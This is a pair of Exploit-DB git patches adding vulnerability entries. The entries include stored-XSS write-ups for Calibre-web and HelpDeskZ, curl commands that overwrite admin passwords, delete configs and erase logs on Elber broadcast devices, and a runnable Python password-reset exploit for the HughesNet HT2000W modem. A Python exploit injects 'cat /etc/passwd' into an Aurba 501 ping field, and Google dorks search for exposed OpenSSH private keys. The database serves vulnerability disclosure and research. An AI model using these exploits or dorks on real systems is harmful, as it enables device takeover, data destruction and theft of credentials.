From 809d81619e7de523c33f1757a06a759295b0f917 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 24 Aug 2024 00:16:35 +0000 Subject: [PATCH 1/2] DB: 2024-08-24 4 changes to exploits/shellcodes/ghdb Calibre-web 0.6.21 - Stored XSS Helpdeskz v2.0.2 - Stored XSS --- exploits/multiple/webapps/52067.txt | 21 +++++++++++++++++++++ exploits/php/webapps/52068.txt | 29 +++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ ghdb.xml | 24 ++++++++++++++++++++++++ 4 files changed, 76 insertions(+) create mode 100644 exploits/multiple/webapps/52067.txt create mode 100644 exploits/php/webapps/52068.txt diff --git a/exploits/multiple/webapps/52067.txt b/exploits/multiple/webapps/52067.txt new file mode 100644 index 0000000000..219b62180a --- /dev/null +++ b/exploits/multiple/webapps/52067.txt @@ -0,0 +1,21 @@ +# Exploit Title: Stored XSS in Calibre-web +# Date: 07/05/2024 +# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache) +# Vendor Homepage: (https://github.com/janeczku/calibre-web/) +# Version: 0.6.21 - Romesa +# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 +# CVE: CVE-2024-39123 + +## Vulnerability Description +Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. + +## Steps to Reproduce +1. Log in to the application. +2. Upload a new book. +3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint. +4. In the `Comments` field, input the following payload: + + Hello there! + +4. Save the changes. +5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script. \ No newline at end of file diff --git a/exploits/php/webapps/52068.txt b/exploits/php/webapps/52068.txt new file mode 100644 index 0000000000..093a12a66c --- /dev/null +++ b/exploits/php/webapps/52068.txt @@ -0,0 +1,29 @@ +# Exploit Title: Stored XSS Vulnerability via File Name +# Google Dork: N/A +# Date: 08 Aug 2024 +# Exploit Author: Md. Sadikul Islam +# Vendor Homepage: https://www.helpdeskz.com/ +# Software Link: +https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip +# Version: v2.0.2 +# Tested on: Kali Linux / Firefox 115.1.0esr (64-bit) +# CVE : N/A + +Payload: "> +Filename can be Payload: ">.jpg + +VIdeo PoC: +https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link + +Steps to Reproduce: + 1. Log in as a regular user and create a new ticket. + 2. Fill out all the required fields with the necessary information. + 3. Attach an image file with a malicious payload embedded in the +filename. + 4. Submit the ticket. + 5. Access the ticket from the administration panel to trigger the +payload execution. + +Cross-Site Scripting (XSS) exploits can compromise the administration +panel, directly affecting administrators by allowing malicious scripts to +execute within their privileged environment. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1732e9626f..046a34c119 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11754,6 +11754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,,2020-09-07,2020-09-07,0,,,,,, 48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/4877c2b2f378ce5937f56b259b69b02840514d4c/Cacti-postauth-rce.py 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py +52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,, 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,, 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,, 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,, @@ -19615,6 +19616,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10788,exploits/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection",2009-12-29,kaMtiEz,webapps,php,,2009-12-28,,1,,,,,, 40300,exploits/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Arbitrary File Upload",2016-08-29,"Lars Morgenroth",webapps,php,80,2016-08-29,2020-05-26,0,,,,,http://www.exploit-db.comHelpDeskZ-1.0-master.zip, 41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php,,2017-01-30,2017-01-31,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-30-at-222713.png,http://www.exploit-db.comHelpDeskZ-1.0-master.zip, +52068,exploits/php/webapps/52068.txt,"Helpdeskz v2.0.2 - Stored XSS",2024-08-23,"Md. Sadikul Islam",webapps,php,,2024-08-23,2024-08-23,0,,,,,, 45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80,2018-11-14,2018-11-14,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comhelpdezk-1.1.1.zip, 45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80,2018-11-16,2018-11-20,0,,,,,, 41824,exploits/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,webapps,php,,2017-04-06,2017-04-06,0,CVE-2017-7447;CVE-2017-7446,,,,http://www.exploit-db.comhelpdezk-1.1.1.zip, diff --git a/ghdb.xml b/ghdb.xml index e699157325..6977d0be6a 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -60756,6 +60756,18 @@ Sajan Dhakate 2020-10-19 Sajan Dhakate + + 8452 + https://www.exploit-db.com/ghdb/8452 + Files Containing Passwords + ext:nix "BEGIN OPENSSH PRIVATE KEY" + ext:nix "BEGIN OPENSSH PRIVATE KEY" + ext:nix "BEGIN OPENSSH PRIVATE KEY" + https://www.google.com/search?q=ext:nix "BEGIN OPENSSH PRIVATE KEY" + + 2024-08-23 + kstrawn0 + 1239 https://www.exploit-db.com/ghdb/1239 @@ -65035,6 +65047,18 @@ See also: http://www.elladodelmal.com/2017/02/cloudshark-tus-credenciales-en-las 2021-11-15 Anirudh Kumar Kushwaha + + 8451 + https://www.exploit-db.com/ghdb/8451 + Files Containing Passwords + site:github.com "BEGIN OPENSSH PRIVATE KEY" + site:github.com "BEGIN OPENSSH PRIVATE KEY" + site:github.com "BEGIN OPENSSH PRIVATE KEY" + https://www.google.com/search?q=site:github.com "BEGIN OPENSSH PRIVATE KEY" + + 2024-08-23 + kstrawn0 + 4299 https://www.exploit-db.com/ghdb/4299 From 76d99ff06ef169fbf2362deedeff769113473bdc Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sun, 25 Aug 2024 00:16:25 +0000 Subject: [PATCH 2/2] DB: 2024-08-25 7 changes to exploits/shellcodes/ghdb Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure HughesNet HT2000W Satellite Modem - Password Reset Aurba 501 - Authenticated RCE --- exploits/hardware/webapps/52069.txt | 68 ++++++++++++++++++++ exploits/hardware/webapps/52070.txt | 69 +++++++++++++++++++++ exploits/hardware/webapps/52071.txt | 70 +++++++++++++++++++++ exploits/hardware/webapps/52072.txt | 71 +++++++++++++++++++++ exploits/hardware/webapps/52073.py | 96 +++++++++++++++++++++++++++++ exploits/linux/webapps/52074.py | 90 +++++++++++++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 470 insertions(+) create mode 100644 exploits/hardware/webapps/52069.txt create mode 100644 exploits/hardware/webapps/52070.txt create mode 100644 exploits/hardware/webapps/52071.txt create mode 100644 exploits/hardware/webapps/52072.txt create mode 100755 exploits/hardware/webapps/52073.py create mode 100755 exploits/linux/webapps/52074.py diff --git a/exploits/hardware/webapps/52069.txt b/exploits/hardware/webapps/52069.txt new file mode 100644 index 0000000000..a5d34ad7d8 --- /dev/null +++ b/exploits/hardware/webapps/52069.txt @@ -0,0 +1,68 @@ +Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: 1.5.179 Revision 904 + 1.5.56 Revision 884 + 1.229 Revision 440 + +Summary: ESE (Elber Satellite Equipment) product line, designed for the +high-end radio contribution and distribution market, where quality and +reliability are most important. The Elber IRD (Integrated Receiver Decoder) +ESE-01 offers a professional audio quality (and composite video) at an +excellent quality/price ratio. The development of digital satellite contribution +networks and the need to connect a large number of sites require a cheap +but reliable and performing satellite receiver with integrated decoder. + +Desc: The device suffers from an authentication bypass vulnerability through +a direct and unauthorized access to the password management functionality. The +issue allows attackers to bypass authentication by manipulating the set_pwd +endpoint that enables them to overwrite the password of any user within the +system. This grants unauthorized and administrative access to protected areas +of the application compromising the device's system security. + +-------------------------------------------------------------------------- +/modules/pwd.html +------------------ +50: function apply_pwd(level, pwd) +51: { +52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, +53: function(data){ +54: //$.alert({title:'Operation',text:data}); +55: show_message(data); +56: }).fail(function(error){ +57: show_message('Error ' + error.status, 'error'); +58: }); +59: } + +-------------------------------------------------------------------------- + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5820 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php + + +18.08.2023 + +-- + + +$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 + +Ref (lev param): + +Level 7 = SNMP Write Community (snmp_write_pwd) +Level 6 = SNMP Read Community (snmp_read_pwd) +Level 5 = Custom Password? hidden. (custom_pwd) +Level 4 = Display Password (display_pwd)? +Level 2 = Administrator Password (admin_pwd) +Level 1 = Super User Password (puser_pwd) +Level 0 = User Password (user_pwd) \ No newline at end of file diff --git a/exploits/hardware/webapps/52070.txt b/exploits/hardware/webapps/52070.txt new file mode 100644 index 0000000000..fc941972e3 --- /dev/null +++ b/exploits/hardware/webapps/52070.txt @@ -0,0 +1,69 @@ +Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: 1.5.179 Revision 904 + 1.5.56 Revision 884 + 1.229 Revision 440 + +Summary: ESE (Elber Satellite Equipment) product line, designed for the +high-end radio contribution and distribution market, where quality and +reliability are most important. The Elber IRD (Integrated Receiver Decoder) +ESE-01 offers a professional audio quality (and composite video) at an +excellent quality/price ratio. The development of digital satellite contribution +networks and the need to connect a large number of sites require a cheap +but reliable and performing satellite receiver with integrated decoder. + +Desc: The device suffers from an unauthenticated device configuration and +client-side hidden functionality disclosure. + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5821 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php + + +18.08.2023 + +-- + + +# Config fan +$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' +Configuration applied + +# Delete config +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' +File delete successfully + +# Launch upgrade +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' +Upgrade launched Successfully + +# Log erase +$ curl 'http://TARGET/json_data/erase_log.js?until=-2' +Logs erased + +# Until: +# =0 ALL +# =-2 Yesterday +# =-8 Last week +# =-15 Last two weeks +# =-22 Last three weeks +# =-31 Last month + +# Set RX config +$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' +RX Config Applied Successfully + +# Show factory window and FPGA upload (Console) +> cleber_show_factory_wnd() + +# Etc. \ No newline at end of file diff --git a/exploits/hardware/webapps/52071.txt b/exploits/hardware/webapps/52071.txt new file mode 100644 index 0000000000..0e0592543f --- /dev/null +++ b/exploits/hardware/webapps/52071.txt @@ -0,0 +1,70 @@ +Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) + Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) + +Summary: Wayber II is the name of an analogue/digital microwave link +able to transport a Mono or a MPX stereo signal from studio to audio +transmitter. Compact and reliable, it features very high quality and +modern technology both in signal processing and microwave section leading +to outstanding performances. + +Desc: The device suffers from an authentication bypass vulnerability through +a direct and unauthorized access to the password management functionality. The +issue allows attackers to bypass authentication by manipulating the set_pwd +endpoint that enables them to overwrite the password of any user within the +system. This grants unauthorized and administrative access to protected areas +of the application compromising the device's system security. + +-------------------------------------------------------------------------- +/modules/pwd.html +------------------ +50: function apply_pwd(level, pwd) +51: { +52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, +53: function(data){ +54: //$.alert({title:'Operation',text:data}); +55: show_message(data); +56: }).fail(function(error){ +57: show_message('Error ' + error.status, 'error'); +58: }); +59: } + +-------------------------------------------------------------------------- + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5822 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php + + +18.08.2023 + +-- + + +$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 + +Ref (lev param): + +Level 7 = SNMP Write Community (snmp_write_pwd) +Level 6 = SNMP Read Community (snmp_read_pwd) +Level 5 = Custom Password? hidden. (custom_pwd) +Level 4 = Display Password (display_pwd)? +Level 2 = Administrator Password (admin_pwd) +Level 1 = Super User Password (puser_pwd) +Level 0 = User Password (user_pwd) \ No newline at end of file diff --git a/exploits/hardware/webapps/52072.txt b/exploits/hardware/webapps/52072.txt new file mode 100644 index 0000000000..866aa6cc6c --- /dev/null +++ b/exploits/hardware/webapps/52072.txt @@ -0,0 +1,71 @@ +Elber Wayber Analog/Digital Audio STL 4.00 Device Config + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) + Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) + +Summary: Wayber II is the name of an analogue/digital microwave link +able to transport a Mono or a MPX stereo signal from studio to audio +transmitter. Compact and reliable, it features very high quality and +modern technology both in signal processing and microwave section leading +to outstanding performances. + +Desc: The device suffers from an unauthenticated device configuration and +client-side hidden functionality disclosure. + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5823 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php + + +18.08.2023 + +-- + + +# Config fan +$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' +Configuration applied + +# Delete config +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' +File delete successfully + +# Launch upgrade +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' +Upgrade launched Successfully + +# Log erase +$ curl 'http://TARGET/json_data/erase_log.js?until=-2' +Logs erased + +# Until: +# =0 ALL +# =-2 Yesterday +# =-8 Last week +# =-15 Last two weeks +# =-22 Last three weeks +# =-31 Last month + +# Set RX config +$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' +RX Config Applied Successfully + +# Show factory window and FPGA upload (Console) +> cleber_show_factory_wnd() + +# Etc. \ No newline at end of file diff --git a/exploits/hardware/webapps/52073.py b/exploits/hardware/webapps/52073.py new file mode 100755 index 0000000000..1c8d68c4d2 --- /dev/null +++ b/exploits/hardware/webapps/52073.py @@ -0,0 +1,96 @@ +# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset +# Date: 7/16/24 +# Exploit Author: Simon Greenblatt +# Vendor: HughesNet +# Version: Arcadyan httpd 1.0 +# Tested on: Linux +# CVE: CVE-2021-20090 + +import sys +import requests +import re +import base64 +import hashlib +import urllib + +red = "\033[0;41m" +green = "\033[1;34;42m" +reset = "\033[0m" + +def print_banner(): + print(green + ''' + _____________ _______________ _______________ ________ ____ _______________ _______ _______________ + \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ + / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ + \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ + \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / + \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset) + print(" Administrator password reset for HughesNet HT2000W Satellite Modem") + print(''' + Usage: python3 hughes_ht2000w_pass_reset.py + : The new administrator password + : The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n + This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset + the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as + improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''') + return None + +def get_httoken(ip_address): + # Make a GET request to system_p.htm using path traversal + r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm') + if r.status_code != 200: + print(red + f"(-) Failure: Could not request system_p.htm" + reset) + exit() + # Extract the httoken hidden in the DOM and convert it from Base64 + return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii') + +def encode_pass(password): + # Vigenere Cipher + key = "wg7005d" + enc_pass = "" + idx = 0 + for c in password: + enc_pass += str(ord(c) + ord(key[idx])) + "+" + idx = (idx + 1) % len(key) + return enc_pass + +def change_pass(ip_address, httoken, enc_pass): + # Create a POST request with the httoken and the encoded password + headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'} + payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass} + payload = urllib.parse.urlencode(payload, safe=':+') + try: + r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers) + except: + pass + return None + +def verify_pass(ip_address, new_pass): + # Make a GET request to cgi_sys_p.js to verify password + httoken = get_httoken(ip_address) + headers = {'Referer': f'http://{ip_address}/system_p.htm'} + r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers) + if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest(): + print(red + "(-) Failure: Could not verify the hash of the password" + reset) + exit() + +def main(): + if not (len(sys.argv) == 2 or len(sys.argv) == 3): + print_banner() + return + new_pass = sys.argv[1] + ip_address = "192.168.42.1" + if sys.argv == 3: + ip_address = sys.argv[2] + httoken = get_httoken(ip_address) + print(f"[+] Obtained httoken: {httoken}") + enc_pass = encode_pass(new_pass) + change_pass(ip_address, httoken, enc_pass) + print(f"[+] Password reset to: {new_pass}") + verify_pass(ip_address, new_pass) + print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest()) + print("[+] Password successfully changed!") + return + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/52074.py b/exploits/linux/webapps/52074.py new file mode 100755 index 0000000000..1d52ed768d --- /dev/null +++ b/exploits/linux/webapps/52074.py @@ -0,0 +1,90 @@ +# Exploit Title: Remote Command Execution | Aurba 501 +# Date: 17-07-2024 +# Exploit Author: Hosein Vita +# Vendor Homepage: https://www.hpe.com +# Version: Aurba 501 CN12G5W0XX +# Tested on: Linux + +import requests +from requests.auth import HTTPBasicAuth + + +def get_input(prompt, default_value): + user_input = input(prompt) + return user_input if user_input else default_value + + +base_url = input("Enter the base URL: ") +if not base_url: + print("Base URL is required.") + exit(1) + +username = get_input("Enter the username (default: admin): ", "admin") +password = get_input("Enter the password (default: admin): ", "admin") + + +login_url = f"{base_url}/login.cgi" +login_payload = { + "username": username, + "password": password, + "login": "Login" +} + + +login_headers = { + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": base_url, + "Connection": "close" +} + +session = requests.Session() + + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Login to the system +response = session.post(login_url, headers=login_headers, data=login_payload, verify=False) + +# Check if login was successful +if response.status_code == 200 and "login failed" not in response.text.lower(): + print("Login successful!") + + # The command to be executed on the device + command = "cat /etc/passwd" + + + ping_ip = f"4.2.2.4||{command}" + + # Data to be sent in the POST request + data = { + "ping_ip": ping_ip, + "ping_timeout": "1", + "textareai": "", + "ping_start": "Ping" + } + + # Headers to be sent with the request + headers = { + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": base_url, + "Referer": f"{base_url}/admin.cgi?action=ping", + "Connection": "close" + } + + # Sending the HTTP POST request to exploit the vulnerability + exploit_url = f"{base_url}/admin.cgi?action=ping" + response = session.post(exploit_url, headers=headers, data=data, verify=False) + + + if any("root" in value for value in response.headers.values()): + print("Exploit successful! The /etc/passwd file contents are reflected in the headers:") + print(response.headers) + else: + print("Exploit failed. The response headers did not contain the expected output.") +else: + print("Login failed. Please check the credentials and try again.") + +# Print the response headers for further analysis +print(response.headers) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 046a34c119..ccc1d9e836 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -4372,10 +4372,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,, 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,, 52004,exploits/hardware/webapps/52004.txt,"Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, +52069,exploits/hardware/webapps/52069.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, +52070,exploits/hardware/webapps/52070.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, 52006,exploits/hardware/webapps/52006.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, 52007,exploits/hardware/webapps/52007.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, 52002,exploits/hardware/webapps/52002.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, 52003,exploits/hardware/webapps/52003.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,, +52071,exploits/hardware/webapps/52071.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, +52072,exploits/hardware/webapps/52072.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,, 51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, @@ -4516,6 +4520,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 10276,exploits/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,webapps,hardware,,2009-12-02,,1,OSVDB-60666;CVE-2009-4197;OSVDB-60646;OSVDB-60645;OSVDB-60644;OSVDB-60643;OSVDB-60642;OSVDB-60641;OSVDB-60640;OSVDB-60639;CVE-2009-4196,,,,, 43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215,2018-01-01,2018-01-01,0,CVE-2017-17215,,,,,https://pastebin.com/4nzunPB5 45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command 